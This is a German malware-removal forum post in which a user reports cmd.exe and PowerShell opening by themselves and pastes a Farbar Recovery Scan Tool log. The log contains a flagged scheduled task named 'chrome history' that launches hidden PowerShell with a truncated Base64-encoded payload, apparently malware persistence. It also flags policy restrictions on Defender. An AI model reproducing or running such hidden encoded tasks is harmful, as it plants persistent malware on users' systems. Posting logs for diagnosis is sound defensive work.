Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML

Thema geschlossen
Alt 19.07.2022, 12:17   #1
g0s
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Hallo,
dies ist mein erster Beitrag hier, sollte ich grobe Fehler(im hier gewünschten style, oder technische) machen bzw, gemacht haben entschuldige ich mich hier schon einmal.

Folgendes Problem: ich hatte vor einiger Zeit das Problem, dass sich die Powershell Oberfläche geöffnet hat. Daraufhin habe ich im Internet nach Lösungen gesucht. Nach mittellanger Suchzeit habe ich eine Lösung gefunden(Ich habe das Powershell Programm gelöscht)
Daraufhin war das Problem eigentlich gelöst. Nun habe ich ein ähnliches Problem. Jetzt öffnet sich nicht mehr Powershell, sondern cmd.exe.
In beiden Fällen unterbindet Avira das Programm, weißt mich aber daraufhin, dass es sich um einen potenziellen Trojaner handelt. Ich gehe davon aus, dass beide Probleme zusammenhängen.

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 18-07-2022
durchgeführt von chris (Administrator) auf DESKTOP-5G99FIR (19-07-2022 12:28:42)
Gestartet von C:\Users\chris\Downloads
Geladene Profile: chris
Plattform: Microsoft Windows 10 Home Version 21H1 19043.1826 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Opera
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe ->) (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3Svc64.exe
(C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\SentryEye.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRRedir.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServer_x64.exe
(C:\Users\chris\AppData\Local\Programs\Opera GX\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera GX\88.0.4412.85\opera_crashreporter.exe
(C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe ->) (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\TabletDriver.exe
(D:\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) D:\Synapse3\UserProcess\Razer Synapse Service Process.exe
(explorer.exe ->) (Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe <2>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera GX\opera.exe <46>
(services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe
(services.exe ->) (Canon Inc. -> ) C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(services.exe ->) (Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (nordvpn s.a. -> TEFINCOM S.A.) C:\Program Files\NordVPN\nordvpn-service.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc) C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) D:\Synapse3\Service\Razer Synapse Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(svchost.exe ->) (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe
(svchost.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9277520 2020-12-10] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [Sonic Studio 3] => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX2] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX2\CNMNSST2.exe [279240 2016-12-09] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [GaomonTablet] => C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe [2154696 2020-12-13] (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1313408 2017-07-05] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [Discord] => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [68822328 2021-03-09] (Discord Inc. -> Discord Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-07] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Synapse3] => [X]
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Grammarly] => C:\Users\chris\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe [946136 2022-06-15] (Grammarly, Inc. -> )
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [] => [X]
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Energy] => C:\Users\chris\AppData\Roaming\Energy\Energy.exe [134333464 2022-05-23] (Energy ltd) [Datei ist nicht signiert] <==== ACHTUNG
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [MicrosoftEdgeAutoLaunch_0A1E394B2107F9944ED3CB9C6839BC54] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3601824 2022-07-14] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Opera Browser Assistant] => C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [4110832 2022-07-06] (Opera Norway AS -> Opera Software)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\chris\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Discord] => C:\Users\Lisa\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Lisa\AppData\Local\Microsoft\Teams\Update.exe [2454184 2021-05-25] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Opera GX Browser Assistant] => C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" (Keine Datei)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (Keine Datei)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Uninstall 21.180.0905.0007] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\21.180.0905.0007" (Keine Datei)
HKU\S-1-5-18\...\Run: [Synapse3] => D:\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524680 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
HKLM\...\Windows x64\Print Processors\Canon TS3100 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDR.DLL [482816 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3100 series: C:\Windows\system32\CNMLMDR.DLL [1302016 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\103.0.5060.114\Installer\chrmstp.exe [2022-07-07] (Google LLC -> Google LLC)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {06CC8DD5-2DE4-4D09-805E-0F5B5270D6F8} - System32\Tasks\chrome history => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AH (Der Dateneintrag hat 4871 mehr Zeichen). <==== ACHTUNG
Task: {0DB9E82B-D44C-40B1-9034-BF52926268FF} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1614868383 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {18F7131B-A6D1-444B-8F9F-8574666B92FA} - System32\Tasks\Opera GX scheduled Autoupdate 1615284024 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software)
Task: {1F3544CA-9EFA-426B-8B3D-6DD251BE9242} - System32\Tasks\AviraSystemSpeedupVerify => C:\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe [32819448 2022-07-01] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {272E4CE1-8F68-4EED-BFDF-6E01CFD5CFD6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {301CE07D-A872-4027-8AAD-8A51F2F0C8A8} - System32\Tasks\Avira_Security_Update => C:\Windows\system32\net.exe [59904 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
Task: {3240C50E-D84D-4B02-9021-A4B8F23E397F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {36B59BFE-92C3-4577-9EB3-A48F37E15056} - System32\Tasks\Opera scheduled assistant Autoupdate 1609849435 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(1): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> FallbackTelemetry
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(2): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> ServiceWatchdog
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(3): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> CrashCollector
Task: {3B74C5CB-076B-4ACD-8A2A-40E25465D4D5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {3E333973-E2EA-4CE4-B258-1D35A3344F13} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3339120 2021-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {425FFDD3-B209-458B-9A38-8764E722FEA7} - System32\Tasks\Opera scheduled Autoupdate 1609849433 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software)
Task: {44B6801D-33B6-4F15-ADA5-F76C4EC8B8F0} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {4FBF287D-3855-45E8-B865-5291BD52CAD0} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {58DC8299-CE2F-40AB-B652-6335B77E0B7E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {591A781E-5EB7-49FC-ABEF-B22213FC4B88} - System32\Tasks\SS3svc64Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3svc64.exe [811520 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {68E93379-3488-418A-BF23-D339D2B6828B} - System32\Tasks\Avira_Security_Service_SCM_Watchdog => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe [256800 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {83FCF623-1808-4FBD-AD1E-7356AB826511} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8CEF75DB-D658-4A21-9C63-AEDA4DBFFC2D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9FD325D7-7CAB-4139-BE9E-656333181255} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {A4D9313F-C284-4987-80C7-F9D78201EB7F} - System32\Tasks\SS3svc32Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {B2FD02AD-5959-477B-B633-8CDCADA4E7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {C0A61414-43CC-44A1-A233-01EA19897827} - System32\Tasks\Avira_Security_Systray => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe [1642080 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {C1C26AF1-D81F-4EFD-A7F0-0916DF2A7093} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1618593618 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {C5A5E07E-6868-4265-B175-EB2639160ED0} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C93A8B38-65E0-47B2-92AC-F1FB04D75E19} - System32\Tasks\MATLAB R2020b Startup Accelerator => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe [53760 2020-07-29] () [Datei ist nicht signiert]
Task: {D741A068-3D6E-4244-BFA4-F2F9088FE746} - System32\Tasks\Opera GX scheduled Autoupdate 1610475719 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software)
Task: {F6A0EEF0-54C6-4191-B0A3-92DC38612038} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F8C2DD18-065A-47DE-B229-1C94A20EF5AE} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F902C571-8663-425B-B606-A4482E01E1EA} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F94F6760-4107-4CA7-AEFB-57E6BD017C78} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
Task: C:\Windows\Tasks\MATLAB R2020b Startup Accelerator.job => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ACHTUNG (Beschränkung - Zones)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{638dd5ca-05dc-4f0a-8232-6b6c4fda51ff}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{da30106f-af18-4b8c-8cce-01f0c7abbe79}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e2fef4cc-039a-4676-8f28-84e9c961b5ec}: [NameServer] 141.44.1.1,141.44.1.2
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG

Edge: 
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default [2022-07-19]
Edge Extension: (Outlook) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-12-10]
Edge Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\caiblelclndcckfafdaggpephhgfpoip [2022-07-03]
Edge Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\emgfgdclgfeldebanedpihppahgngnle [2022-07-15]
Edge Extension: (Word) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-12-10]
Edge Extension: (Excel) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-12-10]
Edge Extension: (PowerPoint) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-12-10]
Edge HKLM-x32\...\Edge\Extension: [caiblelclndcckfafdaggpephhgfpoip]
Edge HKLM-x32\...\Edge\Extension: [emgfgdclgfeldebanedpihppahgngnle]

FireFox:
========
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2019-07-02] (CANON INC.) [Datei ist nicht signiert]
FF Plugin HKU\S-1-5-21-292222086-413629167-3624375346-1001: jpl.nasa.gov/NASAEyes -> D:\Uni\NASA's Eyes\npNASAEyes.dll [Keine Datei]

Chrome: 
=======
CHR Profile: C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default [2022-07-17]
CHR Notifications: Default -> hxxps://web.whatsapp.com
CHR Extension: (Slides) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-12-10]
CHR Extension: (Docs) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-12-10]
CHR Extension: (Google Drive) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-12-10]
CHR Extension: (YouTube) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-12-10]
CHR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\caljgklbbfbcjjanaijlacgncafpegll [2022-06-19]
CHR Extension: (Watch2Gether) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\cimpffimgeipdhnhjohpbehjkcdpjolg [2022-05-18]
CHR Extension: (Sheets) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-12-10]
CHR Extension: (Stylish - Custom themes for any website) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2022-05-18]
CHR Extension: (NordVPN – VPN Proxy for Privacy & Security) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjoaledfpmneenckfbpdfhkmimnjocfa [2022-06-19]
CHR Extension: (Google Docs Offline) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-04-27]
